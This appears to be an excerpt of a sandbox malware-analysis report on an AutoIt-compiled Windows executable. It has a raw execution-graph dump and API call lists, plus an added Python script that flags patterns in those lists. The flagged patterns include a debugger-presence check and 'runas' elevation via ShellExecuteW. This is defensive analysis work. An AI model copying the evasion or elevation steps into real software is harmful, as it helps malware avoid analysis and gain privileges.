__dosmaperr 103736->103752 103750 dcf636 20 API calls __dosmaperr 103737->103750 103739 dd5749 103751 dcf649 20 API calls __dosmaperr 103739->103751 103742->103728 103743 dd5789 103753 dcf649 20 API calls __dosmaperr 103743->103753 103744 dd5751 103744->103728 103746 dd5791 103754 dd2b5c 26 API 
calls __wsopen_s 103746->103754 103748->103734 103749->103734 103750->103739 103751->103744 103752->103743 103753->103746 103754->103744 103755 db235c 103765 db2365 __fread_nolock 103755->103765 103756 da8ec0 52 API calls 103756->103765 103757 df74e3 103767 e013c8 8 API calls __fread_nolock 103757->103767 103759 df74ef 103763 dabed9 8 API calls 103759->103763 103764 db1ff7 __fread_nolock 103759->103764 103760 db23b6 103762 da7d74 8 API calls 103760->103762 103761 dc014b 8 API calls 103761->103765 103762->103764 103763->103764 103765->103756 103765->103757 103765->103760 103765->103761 103765->103764 103766 dc017b 8 API calls 103765->103766 103766->103765 103767->103759 103768 dadd3d 103769 dadd63 103768->103769 103770 df19c2 103768->103770 103773 dc014b 8 API calls 103769->103773 103791 dadead 103769->103791 103771 df1a46 103770->103771 103772 df1a82 103770->103772 103776 df1a26 103770->103776 103790 df1a7d 103771->103790 103827 e13fe1 81 API calls __wsopen_s 103771->103827 103828 e13fe1 81 API calls __wsopen_s 103772->103828 103779 dadd8d 103773->103779 103826 dbe6e8 207 API calls 103776->103826 103777 dc017b 8 API calls 103785 dadee4 __fread_nolock 103777->103785 103780 dc014b 8 API calls 103779->103780 103779->103785 103782 dadddb 103780->103782 103781 dc017b 8 API calls 103781->103785 103782->103776 103783 dade16 103782->103783 103784 db0340 207 API calls 103783->103784 103786 dade29 103784->103786 103785->103771 103785->103781 103786->103785 103787 df1aa5 103786->103787 103788 dade77 103786->103788 103786->103790 103792 dad526 103786->103792 103829 e13fe1 81 API calls __wsopen_s 103787->103829 103788->103791 103788->103792 103791->103777 103793 dc014b 8 API calls 103792->103793 103794 dad589 103793->103794 103810 dac32d 103794->103810 103797 dc014b 8 API calls 103803 dad66e messages 103797->103803 103799 dabed9 8 API calls 103799->103803 103800 dab4c8 8 API calls 103800->103803 103802 df1f79 103830 e056ae 8 API calls messages 103802->103830 103803->103799 
103803->103800 103803->103802 103804 df1f94 103803->103804 103806 dac3ab 8 API calls 103803->103806 103807 dad911 messages 103803->103807 103806->103803 103808 dad9ac messages 103807->103808 103817 dac3ab 103807->103817 103809 dad9c3 103808->103809 103825 dbe30a 8 API calls messages 103808->103825 103814 dac33d 103810->103814 103811 dac345 103811->103797 103812 dc014b 8 API calls 103812->103814 103813 dabf73 8 API calls 103813->103814 103814->103811 103814->103812 103814->103813 103815 dabed9 8 API calls 103814->103815 103816 dac32d 8 API calls 103814->103816 103815->103814 103816->103814 103818 dac3b9 103817->103818 103824 dac3e1 messages 103817->103824 103819 dac3c7 103818->103819 103820 dac3ab 8 API calls 103818->103820 103821 dac3cd 103819->103821 103822 dac3ab 8 API calls 103819->103822 103820->103819 103821->103824 103831 dac7e0 8 API calls messages 103821->103831 103822->103821 103824->103808 103825->103808 103826->103771 103827->103790 103828->103790 103829->103790 103830->103804 103831->103824 103832 da1033 103837 da68b4 103832->103837 103836 da1042 103838 dabf73 8 API calls 103837->103838 103839 da6922 103838->103839 103845 da589f 103839->103845 103841 da69bf 103843 da1038 103841->103843 103848 da6b14 8 API calls __fread_nolock 103841->103848 103844 dc0413 29 API calls __onexit 103843->103844 103844->103836 103849 da58cb 103845->103849 103848->103841 103850 da58be 103849->103850 103851 da58d8 103849->103851 103850->103841 103851->103850 103852 da58df RegOpenKeyExW 103851->103852 103852->103850 103853 da58f9 RegQueryValueExW 103852->103853 103854 da591a 103853->103854 103855 da592f RegCloseKey 103853->103855 103854->103855 103855->103850 103856 df6555 103857 dc014b 8 API calls 103856->103857 103858 df655c 103857->103858 103860 dc017b 8 API calls 103858->103860 103862 df6575 __fread_nolock 103858->103862 103859 dc017b 8 API calls 103861 df659a 103859->103861 103860->103862 103862->103859 103863 da36f5 103866 da370f 103863->103866 103867 da3726 
103866->103867 103868 da378a 103867->103868 103869 da372b 103867->103869 103905 da3788 103867->103905 103871 de3df4 103868->103871 103872 da3790 103868->103872 103873 da3738 103869->103873 103874 da3804 PostQuitMessage 103869->103874 103870 da376f DefWindowProcW 103908 da3709 103870->103908 103921 da2f92 10 API calls 103871->103921 103875 da37bc SetTimer RegisterWindowMessageW 103872->103875 103876 da3797 103872->103876 103877 da3743 103873->103877 103878 de3e61 103873->103878 103874->103908 103882 da37e5 CreatePopupMenu 103875->103882 103875->103908 103880 da37a0 KillTimer 103876->103880 103881 de3d95 103876->103881 103883 da380e 103877->103883 103884 da374d 103877->103884 103924 e0c8f7 65 API calls ___scrt_fastfail 103878->103924 103890 da3907 Shell_NotifyIconW 103880->103890 103888 de3d9a 103881->103888 103889 de3dd0 MoveWindow 103881->103889 103882->103908 103911 dbfcad 103883->103911 103891 da3758 103884->103891 103892 de3e46 103884->103892 103886 de3e15 103922 dbf23c 40 API calls 103886->103922 103896 de3dbf SetFocus 103888->103896 103897 de3da0 103888->103897 103889->103908 103898 da37b3 103890->103898 103895 da3763 103891->103895 103899 da37f2 103891->103899 103892->103870 103923 e01423 8 API calls 103892->103923 103893 de3e73 103893->103870 103893->103908 103895->103870 103907 da3907 Shell_NotifyIconW 103895->103907 103896->103908 103897->103895 103900 de3da9 103897->103900 103918 da59ff DeleteObject DestroyWindow 103898->103918 103919 da381f 75 API calls ___scrt_fastfail 103899->103919 103920 da2f92 10 API calls 103900->103920 103905->103870 103906 da3802 103906->103908 103909 de3e3a 103907->103909 103910 da396b 60 API calls 103909->103910 103910->103905 103912 dbfd4b 103911->103912 103913 dbfcc5 ___scrt_fastfail 103911->103913 103912->103908 103914 da61a9 55 API calls 103913->103914 103916 dbfcec 103914->103916 103915 dbfd34 KillTimer SetTimer 103915->103912 103916->103915 103917 dffe2b Shell_NotifyIconW 103916->103917 103917->103915 103918->103908 
103919->103906 103920->103908 103921->103886 103922->103895 103923->103905 103924->103893 103925 df5650 103934 dbe3d5 103925->103934 103927 df5666 103929 df56e1 103927->103929 103943 dbaa65 9 API calls 103927->103943 103931 df61d7 103929->103931 103945 e13fe1 81 API calls __wsopen_s 103929->103945 103932 df56c1 103932->103929 103944 e1247e 8 API calls 103932->103944 103935 dbe3e3 103934->103935 103936 dbe3f6 103934->103936 103937 dab4c8 8 API calls 103935->103937 103938 dbe3fb 103936->103938 103939 dbe429 103936->103939 103942 dbe3ed 103937->103942 103940 dc014b 8 API calls 103938->103940 103941 dab4c8 8 API calls 103939->103941 103940->103942 103941->103942 103942->103927 103943->103932 103944->103929 103945->103931 103946 df400f 103961 daeeb0 messages 103946->103961 103947 daf211 PeekMessageW 103947->103961 103948 daef07 GetInputState 103948->103947 103948->103961 103949 daf0d5 103951 df32cd TranslateAcceleratorW 103951->103961 103952 daf28f PeekMessageW 103952->103961 103953 daf273 TranslateMessage DispatchMessageW 103953->103952 103954 daf104 timeGetTime 103954->103961 103955 daf2af Sleep 103972 daf2c0 103955->103972 103956 df4183 Sleep 103956->103972 103957 dbf215 timeGetTime 103957->103972 103958 df33e9 timeGetTime 104013 dbaa65 9 API calls 103958->104013 103960 e0dd87 46 API calls 103960->103972 103961->103947 103961->103948 103961->103949 103961->103951 103961->103952 103961->103953 103961->103954 103961->103955 103961->103956 103961->103958 103975 db0340 207 API calls 103961->103975 103976 db2b20 207 API calls 103961->103976 103978 daf450 103961->103978 103985 daf6d0 103961->103985 104008 dbe915 103961->104008 104014 e1446f 8 API calls 103961->104014 104015 e13fe1 81 API calls __wsopen_s 103961->104015 103962 df421a GetExitCodeProcess 103963 df4246 CloseHandle 103962->103963 103964 df4230 WaitForSingleObject 103962->103964 103963->103972 103964->103961 103964->103963 103965 e3345b GetForegroundWindow 103965->103972 103967 df3d51 103968 df3d59 
103967->103968 103969 df42b8 Sleep 103969->103961 103972->103957 103972->103960 103972->103961 103972->103962 103972->103965 103972->103967 103972->103969 104016 e260b5 8 API calls 103972->104016 104017 e0f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103972->104017 103975->103961 103976->103961 103979 daf46f 103978->103979 103980 daf483 103978->103980 104018 dae960 103979->104018 104050 e13fe1 81 API calls __wsopen_s 103980->104050 103983 daf47a 103983->103961 103984 df4584 103984->103984 103986 daf6ef 103985->103986 104003 daf7dc messages 103986->104003 104067 dc05b2 5 API calls __Init_thread_wait 103986->104067 103989 df45d9 103991 dabf73 8 API calls 103989->103991 103989->104003 103990 dabf73 8 API calls 103990->104003 103993 df45f3 103991->103993 103992 e13fe1 81 API calls 103992->104003 104068 dc0413 29 API calls __onexit 103993->104068 103994 dabe2d 39 API calls 103994->104003 103997 df45fd 104069 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103997->104069 104001 db0340 207 API calls 104001->104003 104002 dabed9 8 API calls 104002->104003 104003->103990 104003->103992 104003->103994 104003->104001 104003->104002 104004 dafae1 104003->104004 104005 db1ca0 8 API calls 104003->104005 104066 dbb35c 207 API calls 104003->104066 104070 dc05b2 5 API calls __Init_thread_wait 104003->104070 104071 dc0413 29 API calls __onexit 104003->104071 104072 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104003->104072 104073 e25231 101 API calls 104003->104073 104074 e2731e 207 API calls 104003->104074 104004->103961 104005->104003 104009 dbe959 104008->104009 104010 dbe928 104008->104010 104009->103961 104010->104009 104011 dbe94c IsDialogMessageW 104010->104011 104012 dfeff6 GetClassLongW 104010->104012 104011->104009 104011->104010 104012->104010 104012->104011 104013->103961 104014->103961 104015->103961 104016->103972 104017->103972 104019 db0340 207 API calls 104018->104019 104021 
dae99d 104019->104021 104020 daea0b messages 104020->103983 104021->104020 104023 daedd5 104021->104023 104024 daeac3 104021->104024 104030 daebb8 104021->104030 104035 df31d3 104021->104035 104039 dc014b 8 API calls 104021->104039 104045 daeb29 __fread_nolock messages 104021->104045 104023->104020 104033 dc017b 8 API calls 104023->104033 104024->104023 104026 daeace 104024->104026 104025 daecff 104028 df31c4 104025->104028 104029 daed14 104025->104029 104027 dc014b 8 API calls 104026->104027 104038 daead5 __fread_nolock 104027->104038 104063 e26162 8 API calls 104028->104063 104032 dc014b 8 API calls 104029->104032 104034 dc017b 8 API calls 104030->104034 104042 daeb6a 104032->104042 104033->104038 104034->104045 104064 e13fe1 81 API calls __wsopen_s 104035->104064 104036 dc014b 8 API calls 104037 daeaf6 104036->104037 104037->104045 104051 dad260 104037->104051 104038->104036 104038->104037 104039->104021 104041 df31b3 104062 e13fe1 81 API calls __wsopen_s 104041->104062 104042->103983 104045->104025 104045->104041 104045->104042 104046 df318e 104045->104046 104048 df316c 104045->104048 104059 da44fe 207 API calls 104045->104059 104061 e13fe1 81 API calls __wsopen_s 104046->104061 104060 e13fe1 81 API calls __wsopen_s 104048->104060 104050->103984 104052 dad29a 104051->104052 104053 dad2c6 104051->104053 104054 daf6d0 207 API calls 104052->104054 104057 dad2a0 104052->104057 104055 db0340 207 API calls 104053->104055 104054->104057 104056 df184b 104055->104056 104056->104057 104065 e13fe1 81 API calls __wsopen_s 104056->104065 104057->104045 104059->104045 104060->104042 104061->104042 104062->104042 104063->104035 104064->104020 104065->104057 104066->104003 104067->103989 104068->103997 104069->104003 104070->104003 104071->104003 104072->104003 104073->104003 104074->104003 104075 dcf06e 104076 dcf07a CallCatchBlock 104075->104076 104077 dcf09b 104076->104077 104078 dcf086 104076->104078 104088 dc94fd EnterCriticalSection 104077->104088 104094 dcf649 20 API 
calls __dosmaperr 104078->104094 104081 dcf08b 104095 dd2b5c 26 API calls __wsopen_s 104081->104095 104082 dcf0a7 104089 dcf0db 104082->104089 104087 dcf096 __wsopen_s 104088->104082 104097 dcf106 104089->104097 104091 dcf0e8 104092 dcf0b4 104091->104092 104117 dcf649 20 API calls __dosmaperr 104091->104117 104096 dcf0d1 LeaveCriticalSection __fread_nolock 104092->104096 104094->104081 104095->104087 104096->104087 104098 dcf12e 104097->104098 104099 dcf114 104097->104099 104100 dcdcc5 __fread_nolock 26 API calls 104098->104100 104121 dcf649 20 API calls __dosmaperr 104099->104121 104102 dcf137 104100->104102 104118 dd9789 104102->104118 104103 dcf119 104122 dd2b5c 26 API calls __wsopen_s 104103->104122 104107 dcf1bf 104111 dcf1dc 104107->104111 104113 dcf1ee 104107->104113 104108 dcf23b 104109 dcf248 104108->104109 104108->104113 104124 dcf649 20 API calls __dosmaperr 104109->104124 104123 dcf41f 31 API calls 4 library calls 104111->104123 104114 dcf124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104113->104114 104125 dcf29b 30 API calls 2 library calls 104113->104125 104114->104091 104115 dcf1e6 104115->104114 104117->104092 104126 dd9606 104118->104126 104120 dcf153 104120->104107 104120->104108 104120->104114 104121->104103 104122->104114 104123->104115 104124->104114 104125->104114 104127 dd9612 CallCatchBlock 104126->104127 104128 dd961a 104127->104128 104129 dd9632 104127->104129 104152 dcf636 20 API calls __dosmaperr 104128->104152 104131 dd96e6 104129->104131 104135 dd966a 104129->104135 104157 dcf636 20 API calls __dosmaperr 104131->104157 104132 dd961f 104153 dcf649 20 API calls __dosmaperr 104132->104153 104151 dd54ba EnterCriticalSection 104135->104151 104136 dd96eb 104158 dcf649 20 API calls __dosmaperr 104136->104158 104139 dd9670 104141 dd96a9 104139->104141 104142 dd9694 104139->104142 104140 dd96f3 104159 dd2b5c 26 API calls __wsopen_s 104140->104159 104144 dd970b __wsopen_s 28 API calls 104141->104144 104154 dcf649 20 API calls __dosmaperr 
104142->104154 104148 dd96a4 104144->104148 104146 dd9699 104155 dcf636 20 API calls __dosmaperr 104146->104155 104147 dd9627 __wsopen_s 104147->104120 104156 dd96de LeaveCriticalSection __wsopen_s 104148->104156 104151->104139 104152->104132 104153->104147 104154->104146 104155->104148 104156->104147 104157->104136 104158->104140 104159->104147 104160 dc076b 104161 dc0777 CallCatchBlock 104160->104161 104190 dc0221 104161->104190 104163 dc077e 104164 dc08d1 104163->104164 104167 dc07a8 104163->104167 104228 dc0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104164->104228 104166 dc08d8 104229 dc51c2 28 API calls _abort 104166->104229 104177 dc07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104167->104177 104201 dd27ed 104167->104201 104169 dc08de 104230 dc5174 28 API calls _abort 104169->104230 104173 dc08e6 104174 dc07c7 104181 dc0848 104177->104181 104224 dc518a 38 API calls 3 library calls 104177->104224 104178 dc084e 104213 da331b 104178->104213 104209 dc0cc9 104181->104209 104184 dc086a 104184->104166 104185 dc086e 104184->104185 104186 dc0877 104185->104186 104226 dc5165 28 API calls _abort 104185->104226 104227 dc03b0 13 API calls 2 library calls 104186->104227 104189 dc087f 104189->104174 104191 dc022a 104190->104191 104231 dc0a08 IsProcessorFeaturePresent 104191->104231 104193 dc0236 104232 dc3004 10 API calls 3 library calls 104193->104232 104195 dc023b 104200 dc023f 104195->104200 104233 dd2687 104195->104233 104198 dc0256 104198->104163 104200->104163 104202 dd2804 104201->104202 104203 dc0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 104202->104203 104204 dc07c1 104203->104204 104204->104174 104205 dd2791 104204->104205 104207 dd27c0 104205->104207 104206 dc0dfc 
__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 104208 dd27e9 104206->104208 104207->104206 104208->104177 104301 dc26b0 104209->104301 104212 dc0cef 104212->104178 104214 da3327 IsThemeActive 104213->104214 104216 da3382 104213->104216 104303 dc52b3 104214->104303 104225 dc0d02 GetModuleHandleW 104216->104225 104217 da3352 104309 dc5319 104217->104309 104219 da3359 104316 da32e6 SystemParametersInfoW SystemParametersInfoW 104219->104316 104221 da3360 104317 da338b 104221->104317 104223 da3368 SystemParametersInfoW 104223->104216 104224->104181 104225->104184 104226->104186 104227->104189 104228->104166 104229->104169 104230->104173 104231->104193 104232->104195 104237 ddd576 104233->104237 104236 dc302d 8 API calls 3 library calls 104236->104200 104240 ddd593 104237->104240 104241 ddd58f 104237->104241 104239 dc0248 104239->104198 104239->104236 104240->104241 104243 dd4f6e 104240->104243 104255 dc0dfc 104241->104255 104244 dd4f7a CallCatchBlock 104243->104244 104262 dd32d1 EnterCriticalSection 104244->104262 104246 dd4f81 104263 dd5422 104246->104263 104248 dd4f90 104249 dd4f9f 104248->104249 104276 dd4e02 29 API calls 104248->104276 104278 dd4fbb LeaveCriticalSection _abort 104249->104278 104252 dd4f9a 104277 dd4eb8 GetStdHandle GetFileType 104252->104277 104253 dd4fb0 __wsopen_s 104253->104240 104256 dc0e05 104255->104256 104257 dc0e07 IsProcessorFeaturePresent 104255->104257 104256->104239 104259 dc0fce 104257->104259 104300 dc0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104259->104300 104261 dc10b1 104261->104239 104262->104246 104264 dd542e CallCatchBlock 104263->104264 104265 dd543b 104264->104265 104266 dd5452 104264->104266 104287 dcf649 20 API calls __dosmaperr 104265->104287 104279 dd32d1 EnterCriticalSection 104266->104279 104269 dd5440 104288 dd2b5c 26 API calls __wsopen_s 104269->104288 104272 dd545e 104275 dd548a 
104272->104275 104280 dd5373 104272->104280 104273 dd544a __wsopen_s 104273->104248 104289 dd54b1 LeaveCriticalSection _abort 104275->104289 104276->104252 104277->104249 104278->104253 104279->104272 104290 dd4ff0 104280->104290 104282 dd5392 104284 dd2d38 _free 20 API calls 104282->104284 104283 dd5385 104283->104282 104297 dd3778 11 API calls 2 library calls 104283->104297 104286 dd53e4 104284->104286 104286->104272 104287->104269 104288->104273 104289->104273 104295 dd4ffd __dosmaperr 104290->104295 104291 dd503d 104299 dcf649 20 API calls __dosmaperr 104291->104299 104292 dd5028 RtlAllocateHeap 104293 dd503b 104292->104293 104292->104295 104293->104283 104295->104291 104295->104292 104298 dc521d 7 API calls 2 library calls 104295->104298 104297->104283 104298->104295 104299->104293 104300->104261 104302 dc0cdc GetStartupInfoW 104301->104302 104302->104212 104304 dc52bf CallCatchBlock 104303->104304 104366 dd32d1 EnterCriticalSection 104304->104366 104306 dc52ca pre_c_initialization 104367 dc530a 104306->104367 104308 dc52ff __wsopen_s 104308->104217 104310 dc533f 104309->104310 104311 dc5325 104309->104311 104310->104219 104311->104310 104371 dcf649 20 API calls __dosmaperr 104311->104371 104313 dc532f 104372 dd2b5c 26 API calls __wsopen_s 104313->104372 104315 dc533a 104315->104219 104316->104221 104318 da339b __wsopen_s 104317->104318 104319 dabf73 8 API calls 104318->104319 104320 da33a7 GetCurrentDirectoryW 104319->104320 104373 da4fd9 104320->104373 104322 da33ce IsDebuggerPresent 104323 da33dc 104322->104323 104324 de3ca3 MessageBoxA 104322->104324 104325 de3cbb 104323->104325 104326 da33f0 104323->104326 104324->104325 104477 da4176 8 API calls 104325->104477 104441 da3a95 104326->104441 104333 da3462 104335 de3cec SetCurrentDirectoryW 104333->104335 104336 da346a 104333->104336 104335->104336 104337 da3475 104336->104337 104478 e01fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104336->104478 104473 da34d3 7 API calls 104337->104473 104340 
Execution graph for the module at 00DA0000: rendered as an interactive node/edge graph in the original report; the raw node list is omitted here. Windows APIs reachable in this graph region: CreateWindowExW, ShowWindow, Shell_NotifyIconW, RegisterWindowMessageW, SetCurrentDirectoryW, GetLongPathNameW, GetOpenFileNameW, GetForegroundWindow, ShellExecuteW, LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary, FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal, CreateFileW, GetFileType, GetLastError, CloseHandle, GetStdHandle, OleInitialize, InitializeCriticalSectionAndSpinCount, InterlockedExchange, GetCurrentProcess, DuplicateHandle, CreateThread, EnterCriticalSection, LeaveCriticalSection. CRT helpers on the same paths: _strftime, _wcslen, __wsopen_s, __fread_nolock, __dosmaperr, _free.

Control-flow Graph

Basic-block graph of the function at 00DA5FC8, rendered interactively in the original report (executed blocks highlighted); the block list is omitted here. Recoverable structure: the entry block 00DA5FC8-00DA6037 calls GetVersionExW; block 00DA611C-00DA6136 calls GetCurrentProcess and IsWow64Process; block 00DA6150-00DA615F calls LoadLibraryA and, on success, 00DA6161-00DA616F calls GetProcAddress; if that also succeeds 00DA6171-00DA6175 calls GetNativeSystemInfo, otherwise 00DA619D-00DA61A7 falls back to GetSystemInfo; 00DA617B-00DA617C calls FreeLibrary.
APIs
• GetVersionExW.KERNEL32(?), ref: 00DA5FF7
  • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
• GetCurrentProcess.KERNEL32(?,00E3DC2C,00000000,?,?), ref: 00DA6123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00DA612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00DA6155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DA6167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00DA6175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00DA617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00DA61A1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 0d5d223fc0e0e97d97fd12863d738b6b48e2708330c33d103e55622b1eedc5fa
• Instruction ID: 5a79a0d839bed7ec3c99e919b403769a1321ee19648b07ce68abe8d317f1ef53
• Opcode Fuzzy Hash: 0d5d223fc0e0e97d97fd12863d738b6b48e2708330c33d103e55622b1eedc5fa
• Instruction Fuzzy Hash: 0FA1A52180A3C6EFC711DB6BBC451957FA46B27344B0C58ADE688B72A6D22D85CCCB35
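The per-function API lists in this report share one line format (`• Api.MODULE(stack values), ref: address`, with nested `Part of subcall function` entries). The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: a small Python parser for that format plus a triage pass that flags what these two functions actually show: the LoadLibraryA/GetProcAddress resolution of GetNativeSystemInfo with a GetSystemInfo fallback, the IsDebuggerPresent check, the AutoIt EULA MessageBoxA text, and the `runas` verb sitting on the stack around ShellExecuteW. The sample lines are copied from the API list above and from the startup function's list in the next block; the rule labels in `triage()` are my own, not Joe Sandbox signature names.

```python
"""Parse a Joe Sandbox per-function API list and flag the patterns seen in this stub.

Input format is one call per line, exactly as rendered in the report:
    • GetVersionExW.KERNEL32(?), ref: 00DA5FF7
    • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
The rule names in triage() are the author's own labels, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"          # argument list is optional (CRT helpers have none)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]                    # stack values as captured; '?' means unknown
    ref: int                           # address of the call instruction
    subcall_of: Optional[int] = None   # callee function when the line is a "Part of subcall"


def parse_api_list(text: str) -> List[ApiCall]:
    """Return the parsed calls in report order; lines that are not API entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module").upper(),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def triage(calls: List[ApiCall]) -> List[str]:
    """Apply a few analyst rules to one function's call list and return readable findings."""
    names = {c.api for c in calls}
    findings = []
    if "IsDebuggerPresent" in names:
        findings.append("anti-debug: IsDebuggerPresent")
    if "GetProcAddress" in names and names & {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExW"}:
        # Only symbolic names are interesting; hex values and '?' are unresolved stack slots.
        resolved = [a for c in calls if c.api == "GetProcAddress"
                    for a in c.args if re.fullmatch(r"[A-Za-z_]\w*", a)]
        findings.append("dynamic import: GetProcAddress(%s)" % ", ".join(resolved))
    if "ShellExecuteW" in names and any(a.lower() == "runas" for c in calls for a in c.args):
        findings.append("elevation: 'runas' verb on the stack around ShellExecuteW")
    for c in calls:
        if c.api.startswith("MessageBox") and any("AutoIt" in a for a in c.args):
            findings.append("AutoIt runtime: EULA message box at %08X" % c.ref)
    return findings


# Sample input copied from this report's API lists (first the OS-info function,
# then a subset of the startup function's list from the next block).
SAMPLE_OSINFO = """
• GetVersionExW.KERNEL32(?), ref: 00DA5FF7
  • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
• GetCurrentProcess.KERNEL32(?,00E3DC2C,00000000,?,?), ref: 00DA6123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00DA612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00DA6155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DA6167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00DA6175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00DA617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00DA61A1
"""

SAMPLE_STARTUP = """
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DA3368,?), ref: 00DA33BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DA3368,?), ref: 00DA33CE
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00DE3CB0
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E631F4,00E72418,?,?,?,?,?,?,?,00DA3368), ref: 00DE3D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00DE3D81
"""

if __name__ == "__main__":
    for label, sample in (("os-info", SAMPLE_OSINFO), ("startup", SAMPLE_STARTUP)):
        calls = parse_api_list(sample)
        print(label, [c.api for c in calls])
        for finding in triage(calls):
            print("  ", finding)
```

The `runas` rule deliberately matches any argument slot rather than a specific parameter position: Joe Sandbox records whatever is on the stack at call time, which is why the verb shows up under GetForegroundWindow (ref 00DE3D7A) rather than under the ShellExecuteW call that consumes it one instruction later (ref 00DE3D81).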

Control-flow Graph

Rendered interactively in the original report; not reproduced here.

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DA3368,?), ref: 00DA33BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DA3368,?), ref: 00DA33CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00E72418,00E72400,?,?,?,?,?,?,00DA3368,?), ref: 00DA343A
  • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
  • Part of subcall function 00DA425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DA3462,00E72418,?,?,?,?,?,?,?,00DA3368,?), ref: 00DA42A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,00E72418,?,?,?,?,?,?,?,00DA3368,?), ref: 00DA34BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00DE3CB0
• SetCurrentDirectoryW.KERNEL32(?,00E72418,?,?,?,?,?,?,?,00DA3368,?), ref: 00DE3CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E631F4,00E72418,?,?,?,?,?,?,?,00DA3368), ref: 00DE3D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00DE3D81
  • Part of subcall function 00DA34D3: GetSysColorBrush.USER32(0000000F), ref: 00DA34DE
  • Part of subcall function 00DA34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00DA34ED
  • Part of subcall function 00DA34D3: LoadIconW.USER32(00000063), ref: 00DA3503
  • Part of subcall function 00DA34D3: LoadIconW.USER32(000000A4), ref: 00DA3515
  • Part of subcall function 00DA34D3: LoadIconW.USER32(000000A2), ref: 00DA3527
  • Part of subcall function 00DA34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DA353F
                                                                                                                                                                                • Part of subcall function 00DA34D3: RegisterClassExW.USER32(?), ref: 00DA3590
                                                                                                                                                                                • Part of subcall function 00DA35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DA35E1
                                                                                                                                                                                • Part of subcall function 00DA35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DA3602
